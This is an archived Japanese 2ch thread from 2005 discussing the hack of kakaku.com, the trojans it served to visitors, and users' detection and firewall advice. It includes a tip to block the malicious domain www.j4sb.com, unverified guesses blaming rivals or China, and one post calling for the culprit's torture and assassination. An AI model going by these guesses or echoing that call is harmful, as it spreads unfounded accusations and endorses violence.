5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ネット】"価格.com"、ハッキングで閉鎖。復旧に1週間…閲覧者、ウイルス感染か★4

1 :☆ばぐた☆ ◆JSGFLSFOXQ @あらいぐまさん大好き!φ ★:2005/05/16(月) 11:52:05 ID:??? ?#
※詳細は>>2-10あたりに。

★カカクコム、不正アクセスで閉鎖に 復旧まで1週間?

・日本最大の価格比較サイト「価格.com」を運営するカカクコム(東京都文京区)が、
 サイトの一時閉鎖に追い込まれていることが16日分かった。

 同サイト経由でウイルスソフトが無差別に送りつけられるように何者かにプログラムを
 改ざんされたほか、不正アクセスを通じて同社が保有するメールアドレスが閲覧された
 形跡も見つかったためで、同社は警視庁に届け出た。

 同社によると、プログラムの異常は11日に分かった。不正アクセスがやまず、改ざんの
 範囲が広がったため、14日にサイトを閉鎖した。この間にサイトを閲覧した客は
 ウイルスソフトを取り込んでしまった恐れがあるという。同社はお知らせのサイトを
 設け、対処方法を示している。復旧は1週間後になる見通し。

 カカクコムは00年設立で東証1部上場。電気製品などの価格比較サイトで人気がある。
 http://www.asahi.com/business/update/0516/052.html?t5

・現時点で判明しているウイルスは「trojandownloader.small.AAO」と「PSW.Delf.FZ」の
 2種類。カカクコムによれば、ウイルス対策ソフト「NOD32」で対処が可能なことを確認
 している。他のウイルス対策ソフトについては、「最新の亜種と聞いており、正確な
 情報を得ることが難しい。現在セキュリティ・ソフト各社に確認中で、詳細が判明し
 次第、報告する」(同社)としている。

 同社が保有しているメール・アドレスが不正アクセスの犯人に閲覧された形跡があり、
 2次被害の発生も懸念される。なお、メール・アドレス以外の個人情報に関しては、
 閲覧された形跡はないという。(抜粋)
 http://itpro.nikkeibp.co.jp/free/NC/NEWS/20050516/160843/

※前スレ(実質★3): http://news19.2ch.net/test/read.cgi/newsplus/1116194590/

2 :名無しさん@5周年:2005/05/16(月) 11:52:27 ID:avlids4C
3?


3 :名無しさん@5周年:2005/05/16(月) 11:52:32 ID:CSWc/K0c
まだやってんのか


4 :☆ばぐた☆ ◆JSGFLSFOXQ @あらいぐまさん大好き!φ ★:2005/05/16(月) 11:52:34 ID:??? ?#
http://kakaku.com/ より転載

【重要なお知らせ】
当社運営サイトに対する不正アクセスとサイト一時閉鎖に関してのご報告 2005/5/15

株式会社カカクコム(本社:東京都文京区、代表取締役:穐田誉輝)では当社運営サイトに
対する不正アクセスによりプログラムが改ざんされ、セキュリティ対策を施すためサイトを
一時閉鎖したことをご報告申し上げます。

日頃当社サイトをご支持頂いている方々には、大変なご迷惑をおかけすることとなりましたこと
を心よりお詫び申し上げます。

この改ざんにより、何者かが当社サイトを媒介としてウィルスソフトを無差別に送りつけ、
当社サイトを閲覧されたお客様がウィルスファイルを取込んでしまった可能性があります。
判明しているウィルスは「trojandownloader.small.AAO」「PSW.Delf.FZ」の2種類であり、
アンチウィルスソフト「NOD32」にて対処可能な事を確認しております。

NOD32アンチウイルス体験版ダウンロード(Windowsユーザーのみ)
http://canon-sol.jp/product/nd/trial.html

その他セキュリティソフト各社にも対応を確認中であり、判明次第ご報告させて頂きます。

また、この不正アクセスを通じ当社の保有するメールアドレスが閲覧された形跡がありました。
詳細は調査中であり、事実が判明次第ご報告させて頂きます。
尚、メールアドレス以外の個人情報等に関しましては閲覧された形跡はございません。

(続く)

5 :名無しさん@5周年:2005/05/16(月) 11:52:36 ID:1GvE1h0Q


6 :名無しさん@5周年:2005/05/16(月) 11:52:54 ID:z7qdw9C3
感染してるかどうか
簡単に判別する方法ってあるの?

7 :名無しさん@5周年:2005/05/16(月) 11:53:04 ID:JE2KmZvT
たいして株価落ちてないな、くそ

8 :☆ばぐた☆ ◆JSGFLSFOXQ @あらいぐまさん大好き!φ ★:2005/05/16(月) 11:53:31 ID:??? ?#
(続き)

<これまでの経緯>
5月11日にプログラムの異常が発覚。調査したところ不正アクセスが原因であり、一種の
サイバーテロ的な行為であると認識しました。
即時警察当局等とも相談し、24時間監視体制でサイト運営を続けながらプログラム改ざんの
影響や対抗策、犯人の調査を続けて参りましたが不正アクセスは止まず、改ざんの
範囲が拡大したため止む無く5月14日よりサイトを閉鎖しております。

事件発覚直後より代表取締役 穐田誉輝を委員長とするセキュリティ委員会を設置し、
警視庁ハイテク犯罪対策総合センター、顧問弁護士、システムセキュリティ会社及び
各種専門家の方々の協力も得て、原因究明及び再発防止策の徹底調査を実施して
おります。

一刻も早いサービスの再開に向け全社を上げて対応しておりますが、復旧時期は
一週間後を目処にしております。

本件に関する調査内容などに関しましては今後随時ご報告申し上げます。

<本件に関するお問合せ先>
株式会社カカクコムお問合せ窓口
MAIL:support@kakaku.com


なお【価格.com外為】に関しましては、株式会社外為どっとコム 提供のサービスと
なりますので従来通りのお取引が可能でございます。ご契約時にご案内させて
いただいております専用画面よりご利用いただきますようお願い致します。

9 :名無しさん@5周年:2005/05/16(月) 11:53:59 ID:oKD14BF1
NOD32の体験版リンクだけ用意されてもなあ
他のメジャーなウイルス対策ソフトが対策してるかどうかの情報載せるとかさ

10 :名無しさん@5周年:2005/05/16(月) 11:54:05 ID:t6A36kgM
簡単判別方法

Cドライブを*.cssで検索掛けて、5月11日以降に作成された物が無ければOK。

11 :名無しさん@5周年:2005/05/16(月) 11:54:44 ID:rsta4HXK
>>7
やっぱり犯人はライブドアですか?

12 :名無しさん@5周年:2005/05/16(月) 11:55:06 ID:kaelGdLU
お気に入りに入ってた、あぶねー

13 :名無しさん@5周年:2005/05/16(月) 11:55:31 ID:1GvE1h0Q
価格.com頼みの糞店舗が潰れればワロス

14 :名無しさん@5周年:2005/05/16(月) 11:55:31 ID:mM1pSvJq
もう勢いだけの糞会社はこれだから困るわ!はやく潰れちまえ。

15 :名無しさん@5周年:2005/05/16(月) 11:56:54 ID:mm+IKCOE
昼のニュースで言うかな

16 :名無しさん@5周年:2005/05/16(月) 11:56:55 ID:WWnyr8BN
>>10
やり方おせーて

17 :名無しさん@5周年:2005/05/16(月) 11:57:50 ID:aLOP5dCw
http://www.lovegal2.net/
http://www.jumpb2.net/

こっからスパムこなかった?
どー考えても価格コム関係でメアドが漏れたと思うんだけど。

18 :名無しさん@5周年:2005/05/16(月) 11:58:05 ID:Wniz55vx
一応貼っておいたほうがいいのかな?



■暫定まとめサイト
http://musyoku-waste.hp.infoseek.co.jp/test/index.htm




19 :名無しさん@5周年:2005/05/16(月) 11:58:47 ID:Sddu4QwQ
感染者少ないね

20 :名無しさん@5周年:2005/05/16(月) 11:58:49 ID:ah4mpDvA
カカクコム以外でもiFrameタグとかで
知らないうちにwww.j4sb.comに接続させようとするサイトがいくつもある。

感染しないようにするためにはwww.j4sb.comにアクセスしないようにする。

ProxomitronだったらAdd URL to Blockfileに*www.j4sb.com*をくわえる
そのほかのソフトでも同様の機能を持っているソフトがいくつもある。
avastでもWeb シールドの詳細設定、URLブロックで*www.j4sb.com*にアクセスしない
ようにできる。

21 :名無しさん@5周年:2005/05/16(月) 11:58:56 ID:wTznUYkm
前スレで見事当たってしまった
orz

22 :名無しさん@5周年:2005/05/16(月) 11:59:09 ID:9Nhrj1gk
kakaku公式サイト更新キタ────ヽ(`Д´)ノ ────ッ!!

23 :名無しさん@5周年:2005/05/16(月) 11:59:47 ID:61LIqfi7
ずーっと疑問だったんだけども、例えばウイルスが
「勝手にOEを起動して、登録されてるアドレスにウイルスをばら撒く」ウイルスだった場合
FWはこの通信を止めてくれるんですか?

新種なのでアンチウイルスソフトは未対応、という前提です。

24 :名無しさん@5周年:2005/05/16(月) 11:59:55 ID:yzNKGkDK
僕の肛門も感染しそうです。

25 :名無しさん@5周年:2005/05/16(月) 12:00:08 ID:L3i0ZtL6
だからあれほど、マクOSのWEBSTAR使えって言ったんだ

26 :名無しさん@5周年:2005/05/16(月) 12:00:13 ID:84Z3bULG
NOD32大人気だな。
もしもドットコムとつるんでの自作自演だったらどうよ?

27 :名無しさん@5周年:2005/05/16(月) 12:00:19 ID:oYxXIE2E
価格に対抗できない店舗の仕業だな

28 :名無しさん@5周年:2005/05/16(月) 12:00:25 ID:3SDzDXbH
NOD32のパスワード公開キター!!!!

29 :名無しさん@5周年:2005/05/16(月) 12:00:34 ID:PVVo30Qo
>>20
そのサイトもハックされて改竄されてるってこと?

30 :名無しさん@5周年:2005/05/16(月) 12:00:48 ID:k6puqPLn
>>26
それが真相ですが何か?

31 :名無しさん@5周年:2005/05/16(月) 12:01:04 ID:5Bby6kQI
11日にとっとと公表してれば今頃解決方法とか定義ファイルもできてるんだろうけどなあ・・・
様子見してたって・・・

32 :名無しさん@5周年:2005/05/16(月) 12:01:06 ID:Wniz55vx
これも一応。日本語対応でフリー物です。

ブラウザ:Firefox http://www.mozilla-japan.org/products/firefox/
メーラー:Thunderbird http://www.mozilla-japan.org/products/thunderbird/
オフィス:OpenOffice http://ja.openoffice.org/
スパイウェア対策:Spybot http://enchanting.cside.com/security/spybot1.html
ウィルス対策:avast! http://www.forest.impress.co.jp/lib/inet/security/antivirus/avast.html
ファイアウォール:ZoneAlarm http://jp.zonelabs.com/

33 :名無しさん@5周年:2005/05/16(月) 12:01:28 ID:QCd/QaeY
>>23
FWの設定次第。
何使ってて、どういう設定してるのかわからなければ答えようが無い。

34 :名無しさん@5周年:2005/05/16(月) 12:02:05 ID:jjxrOUdO
NOD32


http://www.nod32.com/
英語版ならオンライン登録しなくても
そのまま勝手に最新版定義でチェック可能


http://www.nod32.com/
英語版ならオンライン登録しなくても
そのまま勝手に最新版定義でチェック可能


http://www.nod32.com/
英語版ならオンライン登録しなくても
そのまま勝手に最新版定義でチェック可能


http://www.nod32.com/
英語版ならオンライン登録しなくても
そのまま勝手に最新版定義でチェック可能


http://www.nod32.com/
英語版ならオンライン登録しなくても
そのまま勝手に最新版定義でチェック可能

35 :名無しさん@5周年:2005/05/16(月) 12:02:05 ID:ah4mpDvA
>>23
FWはまったく関係ないし防げない。

36 :前スレ972:2005/05/16(月) 12:02:06 ID:jMwXRzFG
深夜の段階ではノートン対応してるって話だったから
違うかもしれん。
自分はNODで出てきた。混乱させたらスマソ

37 :名無しさん@5周年:2005/05/16(月) 12:02:29 ID:3SDzDXbH
キタ━━━━(゚∀゚)━━━━!!
http://kakaku.com/nod32j5.exe

38 :名無しさん@5周年:2005/05/16(月) 12:02:34 ID:NV7WW1sn
中野人などいない!

39 :名無しさん@5周年:2005/05/16(月) 12:03:53 ID:IKIUNnpx
OPERAじゃ感染してなかったようだ。

40 :名無しさん@5周年:2005/05/16(月) 12:04:05 ID:RHp8nMFp
>7
1株90万なので、みんな不用意に動かないだろ。


41 :名無しさん@5周年:2005/05/16(月) 12:04:11 ID:eDYUgkJ2
>>37
ほう、きたな

42 :名無しさん@5周年:2005/05/16(月) 12:04:16 ID:woDn49YG
こういう時こそヒゲに糾弾させろと。
それなりに情報を持っているのに出さないとは何を考えているのやら。

43 :名無しさん@5周年:2005/05/16(月) 12:04:24 ID:5oc9ocYh
>>23
そういう挙動ならばSSM入れとけば感染していても大丈夫。
プロセスを細かく監視して止めたりできるので。

44 :名無しさん@5周年:2005/05/16(月) 12:04:38 ID:+5ONeGGP
体験版最新の定義にして検索したら
Win32/PSW.Delf.FZ トロイが検出された orz

45 :名無しさん@5周年:2005/05/16(月) 12:04:39 ID:2uHJOdou
ゲートキーパー何人ぐらいかかってるだろw

46 :名無しさん@5周年:2005/05/16(月) 12:05:03 ID:o4sq8XZu
>>37
これ ナニ?

47 :名無しさん@5周年:2005/05/16(月) 12:05:27 ID:zH7f8VDg
>>37
告知更新キタね

48 :名無しさん@5周年:2005/05/16(月) 12:05:33 ID:Oei7m6Vo
つーか、なんで復旧に1週間もかかるのさ。

49 :名無しさん@5周年:2005/05/16(月) 12:06:29 ID:jMwXRzFG
>>48
鯖をLINUXで組み上げるからでは?

50 :名無しさん@5周年:2005/05/16(月) 12:06:35 ID:61LIqfi7
>>33
OEの通信は全て許可、もしくは
SMTP、POP、APOPに使うポート番号だけを許可、とか
そんな感じで

>>35
やっぱそうですか。。

51 :名無しさん@5周年:2005/05/16(月) 12:06:42 ID:gyhoJ9jr
公式更新しました

http://www.kakaku.com/

【重要なお知らせ2】
当社運営サイトを閲覧されたユーザーの方々へのセキュリティ対策のご報告
2005/5/16 12:00


52 :名無しさん@5周年:2005/05/16(月) 12:07:25 ID:xvQwQ4hd
>>8を読むと侵入発覚後も同じサーバを使ってたように思えるんだが。

53 :名無しさん@5周年:2005/05/16(月) 12:07:33 ID:AyEF+X5I
1000 名前:1000 本日のレス 投稿日:2005/05/16(月) 11:57:09 iDu4DMQC
1000ならNorton先生大激怒

ワロタ

54 :名無しさん@5周年:2005/05/16(月) 12:07:55 ID:ieRIDgbg
>>37
ファイル壊れてるとか言われるんだが・・・

55 :名無しさん@5周年:2005/05/16(月) 12:08:07 ID:AAnXS2CS
>50
FWってのは外部からの不正アクセス遮断ですし、
ソフトによっては内部からのアウトバウンドやアプリ実行も監視してくれますけど、
OEを監視から外していれば意味がないのでは?

56 :名無しさん@5周年:2005/05/16(月) 12:08:26 ID:5oc9ocYh
>>35
しらねぇなら黙ってろ。FWにも色々あるし、プロセス監視が標準で搭載されている
ものもある。
どうすりゃいいか、どういう対処したらいいか、そういうこともわかんねぇヤツが
人にアドバイスなんかするな。


こういうときはSSMを薦めるのがデフォだろうが、ばーか。
【FWと併用】System Safety Monitor Part2
http://pc8.2ch.net/test/read.cgi/sec/1101303186/



57 :名無しさん@5周年:2005/05/16(月) 12:08:36 ID:GKV4McyJ
NOD32用のユーザー名とパスワード公開されたけどあれは何なの?

58 :名無しさん@5周年:2005/05/16(月) 12:08:48 ID:QCd/QaeY
>>50
>OEの通信は全て許可
アウト。

59 :名無しさん@5周年:2005/05/16(月) 12:08:48 ID:7ek7JFak
シマンテックのサポセンに電話で聞いたら、最新のIntelligent Updaterで
対応済みらしい。 
ということで、俺はセーフ。

60 :名無しさん@5周年:2005/05/16(月) 12:08:51 ID:CDjpsfiM
Win鯖(失笑

61 :名無しさん@5周年:2005/05/16(月) 12:08:55 ID:pz7JgnJx
N…ノートン
O…オンライン
D…ディフェンス

62 :名無しさん@5周年:2005/05/16(月) 12:09:16 ID:Wniz55vx

■暫定まとめサイト
価格.comがクラッキングで一時閉鎖、閲覧ユーザーはウイルス感染も(´・ω・)
http://musyoku-waste.hp.infoseek.co.jp/test/index.htm

■kakaku.com(http://kakaku.com/)より抜粋
NOD32アンチウイルス体験版ダウンロード(Windowsユーザーのみ)
http://kakaku.com/nod32j5.exe

セットアップマニュアル(PDF)
http://kakaku.com/nod32trial_man.pdf

体験版ファイルをダウンロードし、セットアップマニュアルに従ってインストールしてください。
ユーザー名、パスワードには、下記をご入力ください。
ユーザー名:AV-2544986
パスワード:viu9hcphek

[有効期限2005年5月31日まで]

63 :名無しさん@5周年:2005/05/16(月) 12:09:32 ID:3SDzDXbH
>>59
15日のやつ?

64 :名無しさん@5周年:2005/05/16(月) 12:10:08 ID:AAnXS2CS
>49
今回の一件で感じたのは、鯖じゃなくて価格の管理者のお粗末さですけどね。
Linux鯖にしても同じようなことをするんじゃないかと思います。
結局は使ってる人間自身の問題じゃないかと…

65 :名無しさん@5周年:2005/05/16(月) 12:11:19 ID:lkzzCOoz
>>56
セキュリティマニアならともかく、普通の奴がSSMなんて理解できっかよ
そんなもん薦めたって使いこなせるわきゃねーだろう。アホ。

66 :名無しさん@5周年:2005/05/16(月) 12:11:26 ID:EeOFdFoY
>>25
米のペンタゴンとか軍の鯖は今でもMac+WEBSTARなのか?
変態じゃないの?

67 :名無しさん@5周年:2005/05/16(月) 12:11:55 ID:xYpZ0yXc
>NOD32

なにこのクソツール。 定義更新とかいうのにパス要求してるwwww

68 :名無しさん@5周年:2005/05/16(月) 12:12:05 ID:hnOXBV6U
意外と感染報告が少ない気もするけど
どうなんだろう

69 :名無しさん@5周年:2005/05/16(月) 12:12:06 ID:7ek7JFak
>>63
ワリー 日付まで聞かなかった

70 :名無しさん@5周年:2005/05/16(月) 12:12:13 ID:GKV4McyJ
>>59
詳しく頼みますわ
Intelligent Updaterの更新でほんとにヒットするかどうかわかってないし・・

71 :名無しさん@5周年:2005/05/16(月) 12:12:31 ID:xvQwQ4hd
>>67
要求しなかったら使い放題じゃないのか
商用だし

72 :名無しさん@5周年:2005/05/16(月) 12:12:47 ID:gyhoJ9jr
conecoやbestgateだと、零細のバッタ屋とか換金屋は引っかからないよな?


73 :名無しさん@5周年:2005/05/16(月) 12:13:03 ID:hbHpcF3C
328 番組の途中ですが名無しです New! 2005/05/16(月) 12:08:29 ID:CQ6Dw18w0
フォルダ丸見えの状態ですので、kakaku.comが更新したとは限らないので念の為注意してくださいー。

74 :名無しさん@5周年:2005/05/16(月) 12:13:08 ID:Wniz55vx
ちょい修正

■暫定まとめサイト
価格.comがクラッキングで一時閉鎖、閲覧ユーザーはウイルス感染も(´・ω・)
http://musyoku-waste.hp.infoseek.co.jp/test/index.htm

■以下は価格.com(http://kakaku.com/)より抜粋
>NOD32アンチウイルス体験版ダウンロード(Windowsユーザーのみ)
>http://kakaku.com/nod32j5.exe
>
>セットアップマニュアル(PDF)
>http://kakaku.com/nod32trial_man.pdf
>
>体験版ファイルをダウンロードし、セットアップマニュアルに従ってインストールしてください。
>ユーザー名、パスワードには、下記をご入力ください。
>ユーザー名:AV-2544986
>パスワード:viu9hcphek
>
>[有効期限2005年5月31日まで]

75 :名無しさん@5周年:2005/05/16(月) 12:13:12 ID:5oc9ocYh
>>65
日本語化できてるし、簡単ですし効果は絶大ですよ。

76 :名無しさん@5周年:2005/05/16(月) 12:13:33 ID:lkzzCOoz
>>67
>定義更新とかいうのにパス要求してるwwww

シェアが低い割れ厨御用達ソフトですから

77 :名無しさん@5周年:2005/05/16(月) 12:13:52 ID:v9xW3exn
>>67
まじでか
英語版だと要求しないらしいがキヤノンの糞仕様のせいか?

78 :名無しさん@5周年:2005/05/16(月) 12:14:00 ID:w6LQlnq0
英語版ならユーザー名とかパスワードいらないけど。
チェックし終わったよ。大丈夫だった。感染していなかった、ホッ。

79 :名無しさん@5周年:2005/05/16(月) 12:14:48 ID:8GJzoOX2
どういったウィルスで感染したらどうなるかぐらい公式に載せとけボケ

80 :名無しさん@5周年:2005/05/16(月) 12:15:09 ID:AAnXS2CS
>59
前スレ22のa02.cssは2005+20050515-008-i32.exeで検出されなかったけどなぁ…

81 :名無しさん@5周年:2005/05/16(月) 12:15:16 ID:ah4mpDvA
>>56
FWでは基本的に..cssから感染するタイプの感染は防げない

FWというのは感染を防ぐものではなく通信をコントロールするもの。
感染後の妙なアクセスや通信を監視することはできる。
しかしIEからのアップロードやダウンロードは基本的にスルーするはず。

82 :名無しさん@5周年:2005/05/16(月) 12:16:33 ID:xYpZ0yXc
http://www.kakaku.com/nod32j5.exe
ユーザー名:AV-2544986
パスワード:viu9hcphek

のっけとけ。 普通わかんねーよ

83 :名無しさん@5周年:2005/05/16(月) 12:16:39 ID:lkzzCOoz
>>75
日本語化できたって、どれを許可していいかどれを許可しちゃいけないか
それが使う奴にわかる筈がないし、そんなもんいちいち説明できねーだろうに。
SSMなんてかなりの上級者向けツールだぞ。そんなもん薦めるのは不親切極まりない。

84 :名無しさん@5周年:2005/05/16(月) 12:16:54 ID:MG/ml2Zu
JavaScript切ってたら大丈夫?

85 :名無しさん@5周年:2005/05/16(月) 12:16:55 ID:K11jgVG4
ダウンロードできないよ

86 :名無しさん@5周年:2005/05/16(月) 12:17:11 ID:Wniz55vx
さらに修正

■暫定まとめサイト
価格.comがクラッキングで一時閉鎖、閲覧ユーザーはウイルス感染も(´・ω・)
http://musyoku-waste.hp.infoseek.co.jp/test/index.htm

■以下は価格.com(http://kakaku.com/)より抜粋
>NOD32アンチウイルス体験版ダウンロード(Windowsユーザーのみ)
>http://kakaku.com/nod32j5.exe
>
>セットアップマニュアル(PDF)
>http://kakaku.com/nod32trial_man.pdf
>
>体験版ファイルをダウンロードし、セットアップマニュアルに従ってインストールしてください。
>ユーザー名、パスワードには、下記をご入力ください。
>ユーザー名:AV-2544986
>パスワード:viu9hcphek
>
>[有効期限2005年5月31日まで]

87 :名無しさん@5周年:2005/05/16(月) 12:17:17 ID:jMwXRzFG
FWはさ、ポートへのアタックとかは監視してるけど
ウイルスとかは関係ないっしょ。

88 :名無しさん@5周年:2005/05/16(月) 12:17:47 ID:STqs7Wit
結局繋がらない。_| ̄|○

89 :名無しさん@5周年:2005/05/16(月) 12:18:23 ID:mm+IKCOE
俺はほとんど無防備だったが無事だった。
IE じゃなくFireFox 使ってたおかげかなぁ

90 :名無しさん@5周年:2005/05/16(月) 12:18:58 ID:gyhoJ9jr
なあ誰も指摘してないが、登録店はなんらかのツールで価格更新してたんだろ?
登録業者が何らかの二次被害をこうむってたという可能性はないか?

91 :名無しさん@5周年:2005/05/16(月) 12:19:10 ID:lv+uYhWK
価格コム終わったなw

92 :名無しさん@5周年:2005/05/16(月) 12:20:53 ID:hSscuS8J
FWとウィルス・セキュリティのオールインワンってありますか。


93 :名無しさん@5周年:2005/05/16(月) 12:21:01 ID:GKV4McyJ
ノートン先生みたいにデフォルトでアウトバンドも監視するFWなら大丈夫だと思うけど。

94 :名無しさん@5周年:2005/05/16(月) 12:21:02 ID:YHZ9jU3s
どんなウイルスなの?
どういう被害にあうの?

95 :名無しさん@5周年:2005/05/16(月) 12:21:25 ID:R/5yZY00
価格コムなんかどうでもいいけどスキャンソフトの出し入れでレジストリめちゃめちゃですよ
こっちは

96 :名無しさん@5周年:2005/05/16(月) 12:21:35 ID:NJgm0cXX
>>59
すまん。
検証したがエンコードしてある、a02.css は Symantec では
検出しないのだが。
デコードされた、ファイルを検出するということかな?


97 :名無しさん@5周年:2005/05/16(月) 12:21:42 ID:mm+IKCOE
あのう、FWという用語が乱発されていますが、
これって Fire Wall のこと?
横からすみませんが、ファイアウォールっていうのは
一般には概念を示す用語なので一概には何も言えないと思います。
ルータの設定もファイアウォールになり得るし、
アプリケーションプロキシを介在させることも同様、
他にもいろいろな道具立てが考えられますね。
間違ってる??

98 :名無しさん@5周年:2005/05/16(月) 12:21:44 ID:hlOTokQs
毎日クリック募金してたけど
感染してないよ

99 :名無しさん@5周年:2005/05/16(月) 12:22:05 ID:HBm+I3hQ
NOD32アンチウイルス使ってみたが
やけに「ファイルを開くときにエラーが発生しました」が頻発する件について・・・。

100 :名無しさん@5周年:2005/05/16(月) 12:22:06 ID:jMwXRzFG
>>90
あー可能性あるよねー・・・今頃対応におおわらわなんだろうなー・・・
NODexeアプロダとかに上げたら違法なんだろうな。というか落ちるか。

こういうのは分散させましょうよ、価格.comさん・・・

101 :名無しさん@5周年:2005/05/16(月) 12:22:07 ID:lkzzCOoz
>>87
んなこともない種類のもあるんだけど、
「通信を許可しますか?」って聞かれたら何でもOK押しちゃう人には無意味

ウィンドウズXPにくっついてるFWだと全く意味なし

102 :名無しさん@5周年:2005/05/16(月) 12:22:22 ID:cGzbdnT+
FWしかPCの方には入れていないがまあ大丈夫だろ。
感染なんて知らね

103 :名無しさん@5周年:2005/05/16(月) 12:22:59 ID:+lkESMlT
ウイルスに感染してた場合損害賠償してもらえないの

104 :名無しさん@5周年:2005/05/16(月) 12:23:30 ID:zAymYc1r
>>100
トレントで流したらダメかな?

105 :名無しさん@5周年:2005/05/16(月) 12:23:31 ID:RphEWRov
不正アクセスしたヤツ、もし捕まったら損害賠償とかで
凄いことになりそうだな。

106 :名無しさん@5周年:2005/05/16(月) 12:23:42 ID:/agDCldP
>>97
FWでまかり通ってるよ。
疑問を持つのは別に構わんけど、既に言葉が浸透しきっているから。

107 :名無しさん@5周年:2005/05/16(月) 12:24:07 ID:JEvM53fL
犯人は国の情報機関が威信にかけて見つけ出して、拉致・拷問の末、暗殺するべきだ。

108 :名無しさん@5周年:2005/05/16(月) 12:24:19 ID:jIIKsYzd
>>10
これ見つからなかったから良かったんだけど、
アンチウィルスソフト全く入れてなかったのになんでだろう。
(ノートン、バスター、マカフィー)
ここ数日ずっとmp3プレイヤー購入検討で価格のページずっと見てたのに。
spybotとspywareblaster入れてたからかな。

109 :名無しさん@5周年:2005/05/16(月) 12:24:22 ID:5oc9ocYh
>>81
だーかーら、私は最初から感染後のことしかいっていませんよ?
ノートンとかのFWが感染後に機能するのなら、定義ファイル更新まで
あわてる必要はない。しかし、ウイルスの中にはFWのプロセスを書き換える
ものもあるのでコイツがFWのプロセスを書き換えるのかどうか知りたいといっているのですが?

ついでにウイルスにそういう機能があってもSSMをいれてプロセスをコントロールしておけば
感染しても屁でもない。

と、いっているだけ。

110 :名無しさん@5周年:2005/05/16(月) 12:24:36 ID:mm+IKCOE
>>106
いや、だから「何を」FWって呼んでるのですか?

111 :名無しさん@5周年:2005/05/16(月) 12:24:56 ID:H6aXtadr
テレビ東京 カカクコム、不正アクセスでサイト閉鎖
CNET Japan
カカクコム、不正アクセスでサイトを一時閉鎖 デジタル ARENA
カカクコム、不正アクセスで閉鎖に 復旧まで1週間? 朝日新聞
価格比較サイトを一時閉鎖/カカクコムにハッカー攻撃 四国新聞
日本経済新聞 - ロイター
16日カカクコム売り気配、サイト一時閉鎖
ラジオNIKKEI

112 :名無しさん@5周年:2005/05/16(月) 12:24:57 ID:FJYtD19Z
ウィルスについて詳しく知りたいならセキュ板でもいったらどうかね?

113 :名無しさん@5周年:2005/05/16(月) 12:25:04 ID:8vqklglH
今回のカカクコムの対応って、自身が感染力の非常に強いウィルスに感染してるのを
知っておきながら、人ごみの多い場所を数日間も徘徊してたのと同じだろ。
これがサイバーテロってんならカカクコムもテロリストの主犯じゃねえかよ。

114 :名無しさん@5周年:2005/05/16(月) 12:25:24 ID:Dh+TG1IF
犯人は「カカクドッドコムだから」狙ったのか
それともセキュリティが甘いところならどこでもよかったのか

どっちだと思う?

115 :名無しさん@5周年:2005/05/16(月) 12:25:35 ID:zFH0YgLD
もちろんそうよ!

116 :名無しさん@5周年:2005/05/16(月) 12:25:57 ID:/agDCldP
>>110
ファイアーウォールソフトの事をそう呼んでるよ。
間違いかどうかは知らんが、もう今更変えようが無い。

117 :名無しさん@5周年:2005/05/16(月) 12:26:24 ID:djuBBtLT
>>110
しつこいな。
FW機能を有するもの全てだよ。

118 :名無しさん@5周年:2005/05/16(月) 12:26:33 ID:1uIjXJFq
>>102
こんなやつがいるからだめなんだよな。

あんた個人の情報やPCにいくら被害が出てもかまわないが
あんたの買ってるウィルスが
他人のPCに勝手に送られていくと言うことを頭に入れておけ

119 :名無しさん@5周年:2005/05/16(月) 12:26:38 ID:l+aQ/o/5
攻性防壁まだー?

120 :名無しさん@5周年:2005/05/16(月) 12:26:47 ID:asW+X1uz
>>113
その通り。

121 :名無しさん@5周年:2005/05/16(月) 12:26:49 ID:SZ1A2nGZ
ざまあみろ、価格.comは糞会社サクセスの提灯持ちのくせしやがって。
客をなめてる会社なんか潰れりゃいいんだよ。

122 :名無しさん@5周年:2005/05/16(月) 12:26:53 ID:LPZ+u4Kd
>>113
その通り!!!

123 :名無しさん@5周年:2005/05/16(月) 12:27:35 ID:lkzzCOoz
>>114
無差別じゃないかな?とオモ
たぶん2chも可能ならやるんじゃないかとオモ。人多いし。

ドメインをwhoisかけるとどうもcn(China)くさい

124 :名無しさん@5周年:2005/05/16(月) 12:27:51 ID:QbfDtAbY
カカクコムの創業者
昨日の日経1面に出てたなあ

125 :名無しさん@5周年:2005/05/16(月) 12:27:53 ID:jzp33fmk
現在のところ、このトロイによるシステムの破壊活動は認められないらしいし、
NortonのPFWなら、感染してても外と通信するプロセス起動したときに確認のダイアログが出るんだから、
それで切っとけばパターンファイル更新までは無問題っつーことでOK?

まだ挙動がはっきりしてないし、気持ち悪いのはあるけど。

126 :名無しさん@5周年:2005/05/16(月) 12:28:08 ID:5oc9ocYh
>>110
「パーソナルファイアーウォール」
これでよろしいか?

というかこの流れの中で、ルーターやらなんやらのことをいっていると
思うのかお前は?

127 :名無しさん@5周年:2005/05/16(月) 12:28:19 ID:tAeEX+4e
>>116
> ファイアーウォールソフトの事をそう呼んでるよ。
そりゃ、まずいな。

「ファイアーウォールソフトでファイアーウォール構築ができる」
と誤解するDQNが増えそう。


128 :名無しさん@5周年:2005/05/16(月) 12:28:22 ID:qe5CHQrj
>>98
おお、それは吉報( ´∀`)

129 :名無しさん@5周年:2005/05/16(月) 12:28:24 ID:GKV4McyJ
>>108
うちも>>10の検索では見つからなかったけど心配だ・・
ノートン先生に加えてspybot、AD-Aware、spywareblasterで固めてたんだけどね。

130 :名無しさん@5周年:2005/05/16(月) 12:28:29 ID:753fGStd
どうやら感染してなかったっぽい
ちょこちょこ見てたから焦ったよ・・・

131 :名無しさん@5周年:2005/05/16(月) 12:28:40 ID:rn6va6vX
>>95
それあるから入れたくないんだよね
はよ、マカフィー更新せんかな

132 :名無しさん@5周年:2005/05/16(月) 12:28:47 ID:Kjr8gtJQ
bitdefender入れたらあっという間に不安定になった、ソフトは
クラッシュするは動作はとろいはで、やってられない。
期待外れもいいとこだ。

133 :名無しさん@5周年:2005/05/16(月) 12:28:47 ID:OhO9iZ1O
不正アクセスがわかった時点で閉鎖させるべきだったな

134 :名無しさん@5周年:2005/05/16(月) 12:28:55 ID:xNxGIZIQ
このウイルスってIEのジャバスクリプトとアクティブX、クッキーを切って
おけば、感染しないタイプだと思うんだが。
価格コムを見たときにこのいずれかのセキュリティレベルを下げていて
ウイルスに感染した人はご終章様としか言いようがない。

135 :名無しさん@5周年:2005/05/16(月) 12:29:29 ID:IINsZdB4
ウイルスバスターの対応ってまだできてないのですか?
初心者ですみません。。。

136 :名無しさん@5周年:2005/05/16(月) 12:29:37 ID:eDYUgkJ2
>>125
挙動がわかってない以上なんとも言えんなぁ

